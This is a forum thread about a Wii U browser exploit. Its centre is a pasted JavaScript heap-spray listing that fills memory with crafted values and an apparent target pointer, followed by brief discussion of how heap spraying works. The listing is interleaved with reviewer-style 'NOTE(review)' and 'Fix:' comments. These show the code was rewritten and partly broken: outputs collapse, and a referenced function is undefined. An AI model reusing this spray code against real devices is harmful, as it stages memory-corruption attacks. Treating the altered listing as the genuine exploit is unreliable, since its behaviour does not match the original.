
Official Wii U Browser Exploit Released

BSnake
Posts: 20
Joined: Fri Jan 07, 2011 10:55 am
Location: Mars

Official Wii U Browser Exploit Released

Post by BSnake »

Maybe someone is interested in this:
http://www.maxconsole.com/maxcon_forums ... t-Released

I have not tested it or anything else.
Devices
  • PSV 3.51 PSM
  • PSVS 3.51 PSM
  • PS4 2.51
  • PS3 4.60 CFW
  • (2) PSP 1000 6.60 PRO
  • PSP 2000 6.60 ME-2.2
  • PSP GO 6.20 PRO
  • PS2 FMCB
  • Xbox 360 Wasabi
  • Xbox 360 RGH
  • Xbox XBMC
  • Wii 4.3 HBC
  • WiiU 5.3.2 :)
shadyblue9o9
Posts: 64
Joined: Thu Jan 06, 2011 5:39 am

Re: Official Wii U Browser Exploit Released

Post by shadyblue9o9 »

OK, I am asking this just because I'm curious as to how the Wii U exploit is actually being executed...

// Create one spray chunk: a text node whose character data is (size - 20)
// UTF-16 code units, then push the node onto `mem` so it stays referenced.
//
//   mem  - array the new text node is appended to (keeps it from being
//          collected)
//   size - nominal chunk size; the node receives size - 20 code units
//          (sizes below 20 make the Uint32Array constructor throw a RangeError)
//   v    - value stored in every slot of the staging Uint32Array
//
// Note: String.fromCharCode keeps only the low 16 bits of each element, so a
// 32-bit v such as 0x1dd7b2c8 reaches the text node as the code unit 0xb2c8
// repeated; the high half of v never makes it into the node's data.
function sprayOne(mem, size, v)
{
  var units = new Uint32Array(size - 20);
  for (var k = units.length; k--;) units[k] = v;
  var data = String.fromCharCode.apply(null, units);
  mem.push(document.createTextNode(data));
}
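// Build a spray string of `size` bytes (size / 2 UTF-16 code units): a
// leading "\u6000\u0000" followed by copies of the filler `c` until the
// target length is reached, trimmed to exactly string_size units.
//
//   size - target size in bytes; the string gets size / 2 code units
//   n    - number of unescape() passes applied afterwards (see below)
//
// Returns: n == 0 -> a one-element array holding the string;
//          n == 1 -> the string itself;
//          n >= 2 -> the string's first character only (see note).
//
// NOTE(review): the loop below reassigns h1 to unescape(h1[0]) on every pass.
// After the first pass h1 is a string (unescape is the identity here, the
// text contains no '%'), so h1[0] is its first character and each later pass
// collapses the result to that single character. The author probably meant
// something else (e.g. filling h1[i]), but the intent cannot be recovered
// from this listing, so the behaviour is kept.
//
// NOTE(review): "%u6000%u0000" is the 32-bit value 0x60000000 and
// "%4bff%fffc" looks like a mangled "%u4bff%ufffc" (0x4bfffffc). On PowerPC
// those encodings would be a nop and an unconditional backward branch, which
// fits the Wii U, but that cannot be confirmed from this post. As written,
// "%4bff%fffc" unescapes to the six characters "Kff\u00fffc"; the literal is
// kept verbatim so the output is unchanged.
//
// Fix: `i` was assigned without a declaration, leaking an implicit global
// (and a ReferenceError under strict mode / ES modules). It is now local.
function spray(size, n)
{
  var string_size = size / 2;
  var str = unescape("%u6000%u0000");
  var c = unescape("%4bff%fffc");

  while (str.length < string_size)
    str += c;

  var h1 = [];
  h1[0] = str.substring(0, string_size);

  for (var i = 1; i <= n; i++)
    h1 = unescape(h1[0]);

  return h1;
}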
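// Build the "incrementing" spray string: 0x160 32-bit slots written as UTF-16
// code units, two units per slot with the high half first. Slot k holds the
// value k, except slots 0 and 0x10c, which hold 0x0e9a161c instead.
//
//   n - number of unescape() passes applied afterwards (see below)
//
// Returns: n == 0 -> a one-element array holding the 704-unit string;
//          n == 1 -> the string itself;
//          n >= 2 -> its first character, "\u0e9a", only (see note).
//
// The original listing spelled the table out as 22 concatenated unescape()
// literals; it is generated here so the two pointer slots are explicit. The
// result is identical unit for unit.
//
// NOTE(review): 0x0e9a161c is presumably an address in the target browser
// (the comment in dsm() talks about a code pointer being read from a sprayed
// value); what it points at cannot be told from this file.
//
// NOTE(review): as in spray(), every pass after the first reassigns h1 to the
// first character of the previous result (unescape is the identity on text
// with no '%'), so for n >= 2 only "\u0e9a" comes back. The call site uses
// n = 30000. Kept as-is since the intent is unclear.
//
// Fix: `i` was assigned without a declaration, leaking an implicit global
// (and a ReferenceError under strict mode / ES modules). It is now local.
function sprayInc(n)
{
  var SLOT_COUNT = 0x160;
  var POINTER_HI = 0x0e9a;
  var POINTER_LO = 0x161c;
  var POINTER_SLOTS = [0, 0x10c];

  var units = [];
  for (var k = 0; k < SLOT_COUNT; k++) {
    if (POINTER_SLOTS.indexOf(k) !== -1) {
      units.push(POINTER_HI, POINTER_LO);
    } else {
      units.push((k >>> 16) & 0xffff, k & 0xffff);
    }
  }
  var str = String.fromCharCode.apply(null, units);

  var h1 = [];
  h1[0] = str;

  for (var i = 1; i <= n; i++)
    h1 = unescape(h1[0]);

  return h1;
}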

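// Spray the heap with text nodes of every size from 20 up to 2047 (each node
// holding size - 20 code units derived from the constant 0x1dd7b2c8 — see
// sprayOne for what actually lands in the node) and return the array that
// keeps them alive.
//
//   evnt - event object; unused, the function is shaped like an event handler
//
// Returns: the array of created text nodes.
//
// Fix: the original built `mem` and then dropped it (no return statement),
// which is presumably why the call site `//var mem = dsm(); //alert(mem.length);`
// is commented out. Returning the array lets a caller hold the spray and
// inspect its size; callers that ignore the return value are unaffected.
//
// NOTE(review): the two trailing comments are the original author's. "the
// code pointer will be read from value + 0x660" describes how the target is
// expected to consume the sprayed value; the bug that makes the browser read
// from sprayed memory is not part of this listing — these helpers only lay
// out memory for it.
function dsm(evnt)
{
  var mem = [];
  var fill = 0x1dd7b2c8;
  for (var size = 20; size < 2048; size++) sprayOne(mem, size, fill);

  // the code pointer will be read from value + 0x660
  // 0x4 only if we spray 0
  return mem;
}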
//var mem = dsm();
//alert(mem.length);
//var pointer = sprayPointer();
// Top-level: the only spray this listing actually performs when the script
// loads. With n = 30000, sprayInc()'s unescape loop collapses its result to
// the single character "\u0e9a" (h1 = unescape(h1[0]) keeps only the first
// character after the first pass), so `pointer` holds one code unit here, not
// the 0x160-slot table. Whether that is intended, or whether the listing was
// mangled when it was copied into the post, cannot be told from here.
// Within this listing dsm() is only referenced from the commented-out line
// above, and sprayPointer() is not defined anywhere in it.
var pointer = sprayInc(30000);
//var code = spray(0x2c0, 60000);

//alert(pointer.length);
//alert(code.length);

So this is the data (in the spoiler) that I pulled from the exploit... It seems to me that they are using the amount of memory the string is allotted to achieve the exploit. I'm assuming that with the Wii U, when the string is added to itself over and over, eventually the string exceeds the amount of memory it is allowed to hold, effectively overwriting important data, which is what causes the crash. Then the var h1 is getting the actual address of it so that the user can later inject the code?

I'm kind of new to this. I've had about a year of C++ programming under my belt, and none of that dealt with actually causing a buffer overflow... but a lot of it has been fixing my own out-of-range, overflow, and memory-leak errors... :) .. so am I somewhat right, hopefully? lol

Also, I believe the reason the exploit does not crash the Vita and just reloads the page is that once the maximum amount of memory the string is allowed to hold is reached, it just reloads the page (like a refresh) to clear the previous data... instead of letting the string continue to write data where it shouldn't :S
Omega2058
Developer
Posts: 246
Joined: Tue Sep 28, 2010 4:27 am

Re: Official Wii U Browser Exploit Released

Post by Omega2058 »

Judging from the function names and what the code does, it simply sprays a string of incrementing values into memory (a heap spray). Also, where the NX bit is enabled the sprayed data is not executable, so it won't work there regardless.

I guess you're somewhat close.
shadyblue9o9
Posts: 64
Joined: Thu Jan 06, 2011 5:39 am

Re: Official Wii U Browser Exploit Released

Post by shadyblue9o9 »

lol... sorry. Well, I tried it on my PS4 as well just to see what it would do, and it says there is not enough system memory =_=
BSnake
Posts: 20
Joined: Fri Jan 07, 2011 10:55 am
Location: Mars

Re: Official Wii U Browser Exploit Released

Post by BSnake »

Update:
Right now, Wii U system software versions from 4.0.0 up to and including 5.1.0 are supported.
Source
Devices
  • PSV 3.51 PSM
  • PSVS 3.51 PSM
  • PS4 2.51
  • PS3 4.60 CFW
  • (2) PSP 1000 6.60 PRO
  • PSP 2000 6.60 ME-2.2
  • PSP GO 6.20 PRO
  • PS2 FMCB
  • Xbox 360 Wasabi
  • Xbox 360 RGH
  • Xbox XBMC
  • Wii 4.3 HBC
  • WiiU 5.3.2 :)
